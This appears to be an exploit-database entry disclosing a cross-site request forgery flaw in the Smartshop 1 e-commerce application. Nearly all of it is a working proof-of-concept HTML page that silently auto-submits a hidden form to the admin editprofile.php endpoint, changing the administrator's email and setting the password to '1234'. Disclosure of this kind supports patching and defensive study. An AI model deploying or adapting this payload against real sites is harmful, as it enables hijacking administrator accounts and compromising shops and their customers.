Smartshop 1 Exploit, Cross-Site Request Forgery

# Exploit Title: Smartshop 1 - Cross site request forgery
# Date: 2018-06-02
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Software Link: https://github.com/smakosh/Smartshop/archive/master.zip
# Vendor Homepage: https://www.behance.net/gallery/49080415/Smartshop-Free-e-commerce-website
# Version: 1
# Tested on: Kali linux
=================================================

# POC : CSRF

# Exploit :
# vulnerable file : editprofile.php

<html>
<head>
   <title>Change admin password</title>
</head>
<body>
   <form method="POST" action="http://127.0.0.1/clone/Smartshop-master/admin/editprofile.php">
    <input type="hidden" name="email" value="decode@test.com">
    <input type="hidden" name="password" value="1234">
    <input type="hidden" name="confirmation" value="1234">
   </form>
 <script>
    document.forms[0].submit();
 </script>
</body>
</html>

==================================================

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD